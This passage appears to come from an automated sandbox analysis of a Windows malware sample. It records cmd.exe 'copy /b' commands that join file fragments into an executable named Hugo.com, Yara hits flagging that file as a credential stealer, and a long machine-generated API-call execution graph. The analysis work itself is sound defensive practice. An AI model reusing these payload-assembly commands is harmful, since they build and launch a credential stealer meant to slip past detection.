                                                                                                                                                                                                            Commandline:cmd /c copy /b 686536\Hugo.com + Ware + Sanyo + Pg + Folk + Lifetime + Robert + Enlarge + Hence 686536\Hugo.com
                                                                                                                                                                                                            Imagebase:0x1c0000
                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:12
                                                                                                                                                                                                            Start time:09:45:17
                                                                                                                                                                                                            Start date:07/01/2025
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:cmd /c copy /b ..\Selection + ..\Suse + ..\Illustrations + ..\Alerts + ..\Smart + ..\Steps + ..\Lovers y
                                                                                                                                                                                                            Imagebase:0x1c0000
                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:13
                                                                                                                                                                                                            Start time:09:45:17
                                                                                                                                                                                                            Start date:07/01/2025
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:Hugo.com y
                                                                                                                                                                                                            Imagebase:0xf10000
                                                                                                                                                                                                            File size:947'288 bytes
                                                                                                                                                                                                            MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2716593365.0000000001B41000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2717609537.0000000001B41000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:14
                                                                                                                                                                                                            Start time:09:45:18
                                                                                                                                                                                                            Start date:07/01/2025
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:choice /d y /t 5
                                                                                                                                                                                                            Imagebase:0x760000
                                                                                                                                                                                                            File size:28'160 bytes
                                                                                                                                                                                                            MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                              Execution Coverage:18.7%
                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                              Signature Coverage:20.7%
                                                                                                                                                                                                              Total number of Nodes:1525
                                                                                                                                                                                                              Total number of Limit Nodes:33
                                                                                                                                                                                                              execution_graph 4341 402fc0 4342 401446 18 API calls 4341->4342 4343 402fc7 4342->4343 4344 403017 4343->4344 4345 40300a 4343->4345 4348 401a13 4343->4348 4346 406805 18 API calls 4344->4346 4347 401446 18 API calls 4345->4347 4346->4348 4347->4348 4349 4023c1 4350 40145c 18 API calls 4349->4350 4351 4023c8 4350->4351 4354 40726a 4351->4354 4357 406ed2 CreateFileW 4354->4357 4358 406f04 4357->4358 4359 406f1e ReadFile 4357->4359 4360 4062a3 11 API calls 4358->4360 4361 4023d6 4359->4361 4364 406f84 4359->4364 4360->4361 4362 4071e3 CloseHandle 4362->4361 4363 406f9b ReadFile lstrcpynA lstrcmpA 4363->4364 4365 406fe2 SetFilePointer ReadFile 4363->4365 4364->4361 4364->4362 4364->4363 4368 406fdd 4364->4368 4365->4362 4366 4070a8 ReadFile 4365->4366 4367 407138 4366->4367 4367->4366 4367->4368 4369 40715f SetFilePointer GlobalAlloc ReadFile 4367->4369 4368->4362 4370 4071a3 4369->4370 4371 4071bf lstrcpynW GlobalFree 4369->4371 4370->4370 4370->4371 4371->4362 4372 401cc3 4373 40145c 18 API calls 4372->4373 4374 401cca lstrlenW 4373->4374 4375 4030dc 4374->4375 4376 4030e3 4375->4376 4378 405f51 wsprintfW 4375->4378 4378->4376 4393 401c46 4394 40145c 18 API calls 4393->4394 4395 401c4c 4394->4395 4396 4062a3 11 API calls 4395->4396 4397 401c59 4396->4397 4398 406c9b 81 API calls 4397->4398 4399 401c64 4398->4399 4400 403049 4401 401446 18 API calls 4400->4401 4404 403050 4401->4404 4402 406805 18 API calls 4403 401a13 4402->4403 4404->4402 4404->4403 4405 40204a 4406 401446 18 API calls 4405->4406 4407 402051 IsWindow 4406->4407 4408 4018d3 4407->4408 4409 40324c 4410 403277 4409->4410 4411 40325e SetTimer 4409->4411 4412 4032cc 4410->4412 4413 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4410->4413 4411->4410 4413->4412 4414 4048cc 4415 4048f1 4414->4415 4416 4048da 4414->4416 4418 4048ff IsWindowVisible 4415->4418 4422 404916 4415->4422 4417 4048e0 4416->4417 4432 40495a 4416->4432 4419 403daf SendMessageW 4417->4419 4421 40490c 4418->4421 4418->4432 4423 4048ea 4419->4423 4420 404960 CallWindowProcW 4420->4423 4433 40484e SendMessageW 4421->4433 4422->4420 4438 406009 lstrcpynW 4422->4438 4426 404945 4439 405f51 wsprintfW 4426->4439 4428 40494c 4429 40141d 80 API calls 4428->4429 4430 404953 4429->4430 4440 406009 lstrcpynW 4430->4440 4432->4420 4434 404871 GetMessagePos ScreenToClient SendMessageW 4433->4434 4435 4048ab SendMessageW 4433->4435 4436 4048a3 4434->4436 4437 4048a8 4434->4437 4435->4436 4436->4422 4437->4435 4438->4426 4439->4428 4440->4432 4441 4022cc 4442 40145c 18 API calls 4441->4442 4443 4022d3 4442->4443 4444 4062d5 2 API calls 4443->4444 4445 4022d9 4444->4445 4446 4022e8 4445->4446 4450 405f51 wsprintfW 4445->4450 4449 4030e3 4446->4449 4451 405f51 wsprintfW 4446->4451 4450->4446 4451->4449 4221 4050cd 4222 405295 4221->4222 4223 4050ee GetDlgItem GetDlgItem GetDlgItem 4221->4223 4224 4052c6 4222->4224 4225 40529e GetDlgItem CreateThread CloseHandle 4222->4225 4270 403d98 SendMessageW 4223->4270 4227 4052f4 4224->4227 4229 4052e0 ShowWindow ShowWindow 4224->4229 4230 405316 4224->4230 4225->4224 4273 405047 83 API calls 4225->4273 4231 405352 4227->4231 4233 405305 4227->4233 4234 40532b ShowWindow 4227->4234 4228 405162 4241 406805 18 API calls 4228->4241 4272 403d98 SendMessageW 4229->4272 4235 403dca 8 API calls 4230->4235 4231->4230 4236 40535d SendMessageW 4231->4236 4237 403d18 SendMessageW 4233->4237 4239 40534b 4234->4239 4240 40533d 4234->4240 4238 40528e 4235->4238 4236->4238 4243 405376 CreatePopupMenu 4236->4243 4237->4230 4242 403d18 SendMessageW 4239->4242 4244 404f72 25 API calls 4240->4244 4245 405181 4241->4245 4242->4231 4246 406805 18 API calls 4243->4246 4244->4239 4247 4062a3 11 API calls 4245->4247 4249 405386 AppendMenuW 4246->4249 4248 40518c GetClientRect GetSystemMetrics SendMessageW SendMessageW 4247->4248 4250 4051f3 4248->4250 4251 4051d7 SendMessageW SendMessageW 4248->4251 4252 405399 GetWindowRect 4249->4252 4253 4053ac 4249->4253 4254 405206 4250->4254 4255 4051f8 SendMessageW 4250->4255 4251->4250 4256 4053b3 TrackPopupMenu 4252->4256 4253->4256 4257 403d3f 19 API calls 4254->4257 4255->4254 4256->4238 4258 4053d1 4256->4258 4259 405216 4257->4259 4260 4053ed SendMessageW 4258->4260 4261 405253 GetDlgItem SendMessageW 4259->4261 4262 40521f ShowWindow 4259->4262 4260->4260 4263 40540a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4260->4263 4261->4238 4266 405276 SendMessageW SendMessageW 4261->4266 4264 405242 4262->4264 4265 405235 ShowWindow 4262->4265 4267 40542f SendMessageW 4263->4267 4271 403d98 SendMessageW 4264->4271 4265->4264 4266->4238 4267->4267 4268 40545a GlobalUnlock SetClipboardData CloseClipboard 4267->4268 4268->4238 4270->4228 4271->4261 4272->4227 4452 4030cf 4453 40145c 18 API calls 4452->4453 4454 4030d6 4453->4454 4456 4030dc 4454->4456 4459 4063ac GlobalAlloc lstrlenW 4454->4459 4457 4030e3 4456->4457 4486 405f51 wsprintfW 4456->4486 4460 4063e2 4459->4460 4461 406434 4459->4461 4462 40640f GetVersionExW 4460->4462 4487 40602b CharUpperW 4460->4487 4461->4456 4462->4461 4463 40643e 4462->4463 4464 406464 LoadLibraryA 4463->4464 4465 40644d 4463->4465 4464->4461 4468 406482 GetProcAddress GetProcAddress GetProcAddress 4464->4468 4465->4461 4467 406585 GlobalFree 4465->4467 4469 40659b LoadLibraryA 4467->4469 4470 4066dd FreeLibrary 4467->4470 4473 4064aa 4468->4473 4476 4065f5 4468->4476 4469->4461 4472 4065b5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4469->4472 4470->4461 4471 406651 FreeLibrary 4480 40662a 4471->4480 4472->4476 4474 4064ce FreeLibrary GlobalFree 4473->4474 4473->4476 4482 4064ea 4473->4482 4474->4461 4475 4066ea 4478 4066ef CloseHandle FreeLibrary 4475->4478 4476->4471 4476->4480 4477 4064fc lstrcpyW OpenProcess 4479 40654f CloseHandle CharUpperW lstrcmpW 4477->4479 4477->4482 4481 406704 CloseHandle 4478->4481 4479->4476 4479->4482 4480->4475 4483 406685 lstrcmpW 4480->4483 4484 4066b6 CloseHandle 4480->4484 4485 4066d4 CloseHandle 4480->4485 4481->4478 4482->4467 4482->4477 4482->4479 4483->4480 4483->4481 4484->4480 4485->4470 4486->4457 4487->4460 4488 407752 4492 407344 4488->4492 4489 407c6d 4490 4073c2 GlobalFree 4491 4073cb GlobalAlloc 4490->4491 4491->4489 4491->4492 4492->4489 4492->4490 4492->4491 4492->4492 4493 407443 GlobalAlloc 4492->4493 4494 40743a GlobalFree 4492->4494 4493->4489 4493->4492 4494->4493 4495 401dd3 4496 401446 18 API calls 4495->4496 4497 401dda 4496->4497 4498 401446 18 API calls 4497->4498 4499 4018d3 4498->4499 4507 402e55 4508 40145c 18 API calls 4507->4508 4509 402e63 4508->4509 4510 402e79 4509->4510 4511 40145c 18 API calls 4509->4511 4512 405e30 2 API calls 4510->4512 4511->4510 4513 402e7f 4512->4513 4537 405e50 GetFileAttributesW CreateFileW 4513->4537 4515 402e8c 4516 402f35 4515->4516 4517 402e98 GlobalAlloc 4515->4517 4520 4062a3 11 API calls 4516->4520 4518 402eb1 4517->4518 4519 402f2c CloseHandle 4517->4519 4538 403368 SetFilePointer 4518->4538 4519->4516 4522 402f45 4520->4522 4524 402f50 DeleteFileW 4522->4524 4525 402f63 4522->4525 4523 402eb7 4527 403336 ReadFile 4523->4527 4524->4525 4539 401435 4525->4539 4528 402ec0 GlobalAlloc 4527->4528 4529 402ed0 4528->4529 4530 402f04 WriteFile GlobalFree 4528->4530 4531 40337f 37 API calls 4529->4531 4532 40337f 37 API calls 4530->4532 4536 402edd 4531->4536 4533 402f29 4532->4533 4533->4519 4535 402efb GlobalFree 4535->4530 4536->4535 4537->4515 4538->4523 4540 404f72 25 API calls 4539->4540 4541 401443 4540->4541 4542 401cd5 4543 401446 18 API calls 4542->4543 4544 401cdd 4543->4544 4545 401446 18 API calls 4544->4545 4546 401ce8 4545->4546 4547 40145c 18 API calls 4546->4547 4548 401cf1 4547->4548 4549 401d07 lstrlenW 4548->4549 4550 401d43 4548->4550 4551 401d11 4549->4551 4551->4550 4555 406009 lstrcpynW 4551->4555 4553 401d2c 4553->4550 4554 401d39 lstrlenW 4553->4554 4554->4550 4555->4553 4556 403cd6 4557 403ce1 4556->4557 4558 403ce5 4557->4558 4559 403ce8 GlobalAlloc 4557->4559 4559->4558 4560 402cd7 4561 401446 18 API calls 4560->4561 4564 402c64 4561->4564 4562 402d99 4563 402d17 ReadFile 4563->4564 4564->4560 4564->4562 4564->4563 4565 402dd8 4566 402ddf 4565->4566 4567 4030e3 4565->4567 4568 402de5 FindClose 4566->4568 4568->4567 4569 401d5c 4570 40145c 18 API calls 4569->4570 4571 401d63 4570->4571 4572 40145c 18 API calls 4571->4572 4573 401d6c 4572->4573 4574 401d73 lstrcmpiW 4573->4574 4575 401d86 lstrcmpW 4573->4575 4576 401d79 4574->4576 4575->4576 4577 401c99 4575->4577 4576->4575 4576->4577 4279 407c5f 4280 407344 4279->4280 4281 4073c2 GlobalFree 4280->4281 4282 4073cb GlobalAlloc 4280->4282 4283 407c6d 4280->4283 4284 407443 GlobalAlloc 4280->4284 4285 40743a GlobalFree 4280->4285 4281->4282 4282->4280 4282->4283 4284->4280 4284->4283 4285->4284 4578 404363 4579 404373 4578->4579 4580 40439c 4578->4580 4582 403d3f 19 API calls 4579->4582 4581 403dca 8 API calls 4580->4581 4583 4043a8 4581->4583 4584 404380 SetDlgItemTextW 4582->4584 4584->4580 4585 4027e3 4586 4027e9 4585->4586 4587 4027f2 4586->4587 4588 402836 4586->4588 4601 401553 4587->4601 4589 40145c 18 API calls 4588->4589 4591 40283d 4589->4591 4593 4062a3 11 API calls 4591->4593 4592 4027f9 4594 40145c 18 API calls 4592->4594 4599 401a13 4592->4599 4595 40284d 4593->4595 4596 40280a RegDeleteValueW 4594->4596 4605 40149d RegOpenKeyExW 4595->4605 4597 4062a3 11 API calls 4596->4597 4600 40282a RegCloseKey 4597->4600 4600->4599 4602 401563 4601->4602 4603 40145c 18 API calls 4602->4603 4604 401589 RegOpenKeyExW 4603->4604 4604->4592 4611 401515 4605->4611 4613 4014c9 4605->4613 4606 4014ef RegEnumKeyW 4607 401501 RegCloseKey 4606->4607 4606->4613 4608 4062fc 3 API calls 4607->4608 4610 401511 4608->4610 4609 401526 RegCloseKey 4609->4611 4610->4611 4614 401541 RegDeleteKeyW 4610->4614 4611->4599 4612 40149d 3 API calls 4612->4613 4613->4606 4613->4607 4613->4609 4613->4612 4614->4611 4615 403f64 4616 403f90 4615->4616 4617 403f74 4615->4617 4619 403fc3 4616->4619 4620 403f96 SHGetPathFromIDListW 4616->4620 4626 405c84 GetDlgItemTextW 4617->4626 4622 403fad SendMessageW 4620->4622 4623 403fa6 4620->4623 4621 403f81 SendMessageW 4621->4616 4622->4619 4624 40141d 80 API calls 4623->4624 4624->4622 4626->4621 4627 402ae4 4628 402aeb 4627->4628 4629 4030e3 4627->4629 4630 402af2 CloseHandle 4628->4630 4630->4629 4631 402065 4632 401446 18 API calls 4631->4632 4633 40206d 4632->4633 4634 401446 18 API calls 4633->4634 4635 402076 GetDlgItem 4634->4635 4636 4030dc 4635->4636 4637 4030e3 4636->4637 4639 405f51 wsprintfW 4636->4639 4639->4637 4640 402665 4641 40145c 18 API calls 4640->4641 4642 40266b 4641->4642 4643 40145c 18 API calls 4642->4643 4644 402674 4643->4644 4645 40145c 18 API calls 4644->4645 4646 40267d 4645->4646 4647 4062a3 11 API calls 4646->4647 4648 40268c 4647->4648 4649 4062d5 2 API calls 4648->4649 4650 402695 4649->4650 4651 4026a6 lstrlenW lstrlenW 4650->4651 4652 404f72 25 API calls 4650->4652 4655 4030e3 4650->4655 4653 404f72 25 API calls 4651->4653 4652->4650 4654 4026e8 SHFileOperationW 4653->4654 4654->4650 4654->4655 4663 401c69 4664 40145c 18 API calls 4663->4664 4665 401c70 4664->4665 4666 4062a3 11 API calls 4665->4666 4667 401c80 4666->4667 4668 405ca0 MessageBoxIndirectW 4667->4668 4669 401a13 4668->4669 4677 402f6e 4678 402f72 4677->4678 4679 402fae 4677->4679 4680 4062a3 11 API calls 4678->4680 4681 40145c 18 API calls 4679->4681 4682 402f7d 4680->4682 4687 402f9d 4681->4687 4683 4062a3 11 API calls 4682->4683 4684 402f90 4683->4684 4685 402fa2 4684->4685 4686 402f98 4684->4686 4689 4060e7 9 API calls 4685->4689 4688 403e74 5 API calls 4686->4688 4688->4687 4689->4687 4690 4023f0 4691 402403 4690->4691 4692 4024da 4690->4692 4693 40145c 18 API calls 4691->4693 4694 404f72 25 API calls 4692->4694 4695 40240a 4693->4695 4700 4024f1 4694->4700 4696 40145c 18 API calls 4695->4696 4697 402413 4696->4697 4698 402429 LoadLibraryExW 4697->4698 4699 40241b GetModuleHandleW 4697->4699 4701 40243e 4698->4701 4702 4024ce 4698->4702 4699->4698 4699->4701 4714 406365 GlobalAlloc WideCharToMultiByte 4701->4714 4703 404f72 25 API calls 4702->4703 4703->4692 4705 402449 4706 40248c 4705->4706 4707 40244f 4705->4707 4708 404f72 25 API calls 4706->4708 4710 401435 25 API calls 4707->4710 4712 40245f 4707->4712 4709 402496 4708->4709 4711 4062a3 11 API calls 4709->4711 4710->4712 4711->4712 4712->4700 4713 4024c0 FreeLibrary 4712->4713 4713->4700 4715 406390 GetProcAddress 4714->4715 4716 40639d GlobalFree 4714->4716 4715->4716 4716->4705 4717 402df3 4718 402dfa 4717->4718 4720 4019ec 4717->4720 4719 402e07 FindNextFileW 4718->4719 4719->4720 4721 402e16 4719->4721 4723 406009 lstrcpynW 4721->4723 4723->4720 4076 402175 4077 401446 18 API calls 4076->4077 4078 40217c 4077->4078 4079 401446 18 API calls 4078->4079 4080 402186 4079->4080 4081 4062a3 11 API calls 4080->4081 4085 402197 4080->4085 4081->4085 4082 4021aa EnableWindow 4084 4030e3 4082->4084 4083 40219f ShowWindow 4083->4084 4085->4082 4085->4083 4731 404077 4732 404081 4731->4732 4733 404084 lstrcpynW lstrlenW 4731->4733 4732->4733 4102 405479 4103 405491 4102->4103 4104 4055cd 4102->4104 4103->4104 4105 40549d 4103->4105 4106 40561e 4104->4106 4107 4055de GetDlgItem GetDlgItem 4104->4107 4108 4054a8 SetWindowPos 4105->4108 4109 4054bb 4105->4109 4111 405678 4106->4111 4119 40139d 80 API calls 4106->4119 4110 403d3f 19 API calls 4107->4110 4108->4109 4113 4054c0 ShowWindow 4109->4113 4114 4054d8 4109->4114 4115 405608 SetClassLongW 4110->4115 4112 403daf SendMessageW 4111->4112 4132 4055c8 4111->4132 4142 40568a 4112->4142 4113->4114 4116 4054e0 DestroyWindow 4114->4116 4117 4054fa 4114->4117 4118 40141d 80 API calls 4115->4118 4171 4058dc 4116->4171 4120 405510 4117->4120 4121 4054ff SetWindowLongW 4117->4121 4118->4106 4122 405650 4119->4122 4125 4055b9 4120->4125 4126 40551c GetDlgItem 4120->4126 4121->4132 4122->4111 4127 405654 SendMessageW 4122->4127 4123 40141d 80 API calls 4123->4142 4124 4058de DestroyWindow KiUserCallbackDispatcher 4124->4171 4181 403dca 4125->4181 4130 40554c 4126->4130 4131 40552f SendMessageW IsWindowEnabled 4126->4131 4127->4132 4129 40590d ShowWindow 4129->4132 4134 405559 4130->4134 4135 4055a0 SendMessageW 4130->4135 4136 40556c 4130->4136 4145 405551 4130->4145 4131->4130 4131->4132 4133 406805 18 API calls 4133->4142 4134->4135 4134->4145 4135->4125 4139 405574 4136->4139 4140 405589 4136->4140 4138 403d3f 19 API calls 4138->4142 4143 40141d 80 API calls 4139->4143 4144 40141d 80 API calls 4140->4144 4141 405587 4141->4125 4142->4123 4142->4124 4142->4132 4142->4133 4142->4138 4162 40581e DestroyWindow 4142->4162 4172 403d3f 4142->4172 4143->4145 4146 405590 4144->4146 4178 403d18 4145->4178 4146->4125 4146->4145 4148 405705 GetDlgItem 4149 405723 ShowWindow KiUserCallbackDispatcher 4148->4149 4150 40571a 4148->4150 4175 403d85 KiUserCallbackDispatcher 4149->4175 4150->4149 4152 40574d EnableWindow 4155 405761 4152->4155 4153 405766 GetSystemMenu EnableMenuItem SendMessageW 4154 405796 SendMessageW 4153->4154 4153->4155 4154->4155 4155->4153 4176 403d98 SendMessageW 4155->4176 4177 406009 lstrcpynW 4155->4177 4158 4057c4 lstrlenW 4159 406805 18 API calls 4158->4159 4160 4057da SetWindowTextW 4159->4160 4161 40139d 80 API calls 4160->4161 4161->4142 4163 405838 CreateDialogParamW 4162->4163 4162->4171 4164 40586b 4163->4164 4163->4171 4165 403d3f 19 API calls 4164->4165 4166 405876 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4165->4166 4167 40139d 80 API calls 4166->4167 4168 4058bc 4167->4168 4168->4132 4169 4058c4 ShowWindow 4168->4169 4170 403daf SendMessageW 4169->4170 4170->4171 4171->4129 4171->4132 4173 406805 18 API calls 4172->4173 4174 403d4a SetDlgItemTextW 4173->4174 4174->4148 4175->4152 4176->4155 4177->4158 4179 403d25 SendMessageW 4178->4179 4180 403d1f 4178->4180 4179->4141 4180->4179 4182 403ddf GetWindowLongW 4181->4182 4192 403e68 4181->4192 4183 403df0 4182->4183 4182->4192 4184 403e02 4183->4184 4185 403dff GetSysColor 4183->4185 4186 403e12 SetBkMode 4184->4186 4187 403e08 SetTextColor 4184->4187 4185->4184 4188 403e30 4186->4188 4189 403e2a GetSysColor 4186->4189 4187->4186 4190 403e41 4188->4190 4191 403e37 SetBkColor 4188->4191 4189->4188 4190->4192 4193 403e54 DeleteObject 4190->4193 4194 403e5b CreateBrushIndirect 4190->4194 4191->4190 4192->4132 4193->4194 4194->4192 4734 4020f9 GetDC GetDeviceCaps 4735 401446 18 API calls 4734->4735 4736 402116 MulDiv 4735->4736 4737 401446 18 API calls 4736->4737 4738 40212c 4737->4738 4739 406805 18 API calls 4738->4739 4740 402165 CreateFontIndirectW 4739->4740 4741 4030dc 4740->4741 4742 4030e3 4741->4742 4744 405f51 wsprintfW 4741->4744 4744->4742 4745 4024fb 4746 40145c 18 API calls 4745->4746 4747 402502 4746->4747 4748 40145c 18 API calls 4747->4748 4749 40250c 4748->4749 4750 40145c 18 API calls 4749->4750 4751 402515 4750->4751 4752 40145c 18 API calls 4751->4752 4753 40251f 4752->4753 4754 40145c 18 API calls 4753->4754 4755 402529 4754->4755 4756 40253d 4755->4756 4757 40145c 18 API calls 4755->4757 4758 4062a3 11 API calls 4756->4758 4757->4756 4759 40256a CoCreateInstance 4758->4759 4760 40258c 4759->4760 4761 40497c GetDlgItem GetDlgItem 4762 4049d2 7 API calls 4761->4762 4767 404bea 4761->4767 4763 404a76 DeleteObject 4762->4763 4764 404a6a SendMessageW 4762->4764 4765 404a81 4763->4765 4764->4763 4768 404ab8 4765->4768 4770 406805 18 API calls 4765->4770 4766 404ccf 4769 404d74 4766->4769 4774 404bdd 4766->4774 4779 404d1e SendMessageW 4766->4779 4767->4766 4777 40484e 5 API calls 4767->4777 4790 404c5a 4767->4790 4773 403d3f 19 API calls 4768->4773 4771 404d89 4769->4771 4772 404d7d SendMessageW 4769->4772 4776 404a9a SendMessageW SendMessageW 4770->4776 4781 404da2 4771->4781 4782 404d9b ImageList_Destroy 4771->4782 4792 404db2 4771->4792 4772->4771 4778 404acc 4773->4778 4780 403dca 8 API calls 4774->4780 4775 404cc1 SendMessageW 4775->4766 4776->4765 4777->4790 4783 403d3f 19 API calls 4778->4783 4779->4774 4785 404d33 SendMessageW 4779->4785 4786 404f6b 4780->4786 4787 404dab GlobalFree 4781->4787 4781->4792 4782->4781 4788 404add 4783->4788 4784 404f1c 4784->4774 4793 404f31 ShowWindow GetDlgItem ShowWindow 4784->4793 4789 404d46 4785->4789 4787->4792 4791 404baa GetWindowLongW SetWindowLongW 4788->4791 4800 404ba4 4788->4800 4803 404b39 SendMessageW 4788->4803 4804 404b67 SendMessageW 4788->4804 4805 404b7b SendMessageW 4788->4805 4799 404d57 SendMessageW 4789->4799 4790->4766 4790->4775 4794 404bc4 4791->4794 4792->4784 4795 404de4 4792->4795 4798 40141d 80 API calls 4792->4798 4793->4774 4796 404be2 4794->4796 4797 404bca ShowWindow 4794->4797 4808 404e12 SendMessageW 4795->4808 4811 404e28 4795->4811 4813 403d98 SendMessageW 4796->4813 4812 403d98 SendMessageW 4797->4812 4798->4795 4799->4769 4800->4791 4800->4794 4803->4788 4804->4788 4805->4788 4806 404ef3 InvalidateRect 4806->4784 4807 404f09 4806->4807 4814 4043ad 4807->4814 4808->4811 4810 404ea1 SendMessageW SendMessageW 4810->4811 4811->4806 4811->4810 4812->4774 4813->4767 4815 4043cd 4814->4815 4816 406805 18 API calls 4815->4816 4817 40440d 4816->4817 4818 406805 18 API calls 4817->4818 4819 404418 4818->4819 4820 406805 18 API calls 4819->4820 4821 404428 lstrlenW wsprintfW SetDlgItemTextW 4820->4821 4821->4784 4822 4026fc 4823 401ee4 4822->4823 4825 402708 4822->4825 4823->4822 4824 406805 18 API calls 4823->4824 4824->4823 4274 4019fd 4275 40145c 18 API calls 4274->4275 4276 401a04 4275->4276 4277 405e7f 2 API calls 4276->4277 4278 401a0b 4277->4278 4826 4022fd 4827 40145c 18 API calls 4826->4827 4828 402304 GetFileVersionInfoSizeW 4827->4828 4829 40232b GlobalAlloc 4828->4829 4833 4030e3 4828->4833 4830 40233f GetFileVersionInfoW 4829->4830 4829->4833 4831 402350 VerQueryValueW 4830->4831 4832 402381 GlobalFree 4830->4832 4831->4832 4835 402369 4831->4835 4832->4833 4839 405f51 wsprintfW 4835->4839 4837 402375 4840 405f51 wsprintfW 4837->4840 4839->4837 4840->4832 4841 402afd 4842 40145c 18 API calls 4841->4842 4843 402b04 4842->4843 4848 405e50 GetFileAttributesW CreateFileW 4843->4848 4845 402b10 4846 4030e3 4845->4846 4849 405f51 wsprintfW 4845->4849 4848->4845 4849->4846 4850 4029ff 4851 401553 19 API calls 4850->4851 4852 402a09 4851->4852 4853 40145c 18 API calls 4852->4853 4854 402a12 4853->4854 4855 402a1f RegQueryValueExW 4854->4855 4857 401a13 4854->4857 4856 402a3f 4855->4856 4860 402a45 4855->4860 4856->4860 4861 405f51 wsprintfW 4856->4861 4859 4029e4 RegCloseKey 4859->4857 4860->4857 4860->4859 4861->4860 4862 401000 4863 401037 BeginPaint GetClientRect 4862->4863 4864 40100c DefWindowProcW 4862->4864 4866 4010fc 4863->4866 4867 401182 4864->4867 4868 401073 CreateBrushIndirect FillRect DeleteObject 4866->4868 4869 401105 4866->4869 4868->4866 4870 401170 EndPaint 4869->4870 4871 40110b CreateFontIndirectW 4869->4871 4870->4867 4871->4870 4872 40111b 6 API calls 4871->4872 4872->4870 4873 401f80 4874 401446 18 API calls 4873->4874 4875 401f88 4874->4875 4876 401446 18 API calls 4875->4876 4877 401f93 4876->4877 4878 401fa3 4877->4878 4879 40145c 18 API calls 4877->4879 4880 401fb3 4878->4880 4881 40145c 18 API calls 4878->4881 4879->4878 4882 402006 4880->4882 4883 401fbc 4880->4883 4881->4880 4885 40145c 18 API calls 4882->4885 4884 401446 18 API calls 4883->4884 4887 401fc4 4884->4887 4886 40200d 4885->4886 4888 40145c 18 API calls 4886->4888 4889 401446 18 API calls 4887->4889 4890 402016 FindWindowExW 4888->4890 4891 401fce 4889->4891 4895 402036 4890->4895 4892 401ff6 SendMessageW 4891->4892 4893 401fd8 SendMessageTimeoutW 4891->4893 4892->4895 4893->4895 4894 4030e3 4895->4894 4897 405f51 wsprintfW 4895->4897 4897->4894 4898 402880 4899 402884 4898->4899 4900 40145c 18 API calls 4899->4900 4901 4028a7 4900->4901 4902 40145c 18 API calls 4901->4902 4903 4028b1 4902->4903 4904 4028ba RegCreateKeyExW 4903->4904 4905 4028e8 4904->4905 4912 4029ef 4904->4912 4906 402934 4905->4906 4907 40145c 18 API calls 4905->4907 4908 402963 4906->4908 4911 401446 18 API calls 4906->4911 4910 4028fc lstrlenW 4907->4910 4909 4029ae RegSetValueExW 4908->4909 4913 40337f 37 API calls 4908->4913 4916 4029c6 RegCloseKey 4909->4916 4917 4029cb 4909->4917 4914 402918 4910->4914 4915 40292a 4910->4915 4918 402947 4911->4918 4919 40297b 4913->4919 4920 4062a3 11 API calls 4914->4920 4921 4062a3 11 API calls 4915->4921 4916->4912 4922 4062a3 11 API calls 4917->4922 4923 4062a3 11 API calls 4918->4923 4929 406224 4919->4929 4925 402922 4920->4925 4921->4906 4922->4916 4923->4908 4925->4909 4928 4062a3 11 API calls 4928->4925 4930 406247 4929->4930 4931 40628a 4930->4931 4932 40625c wsprintfW 4930->4932 4933 402991 4931->4933 4934 406293 lstrcatW 4931->4934 4932->4931 4932->4932 4933->4928 4934->4933 4935 402082 4936 401446 18 API calls 4935->4936 4937 402093 SetWindowLongW 4936->4937 4938 4030e3 4937->4938 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 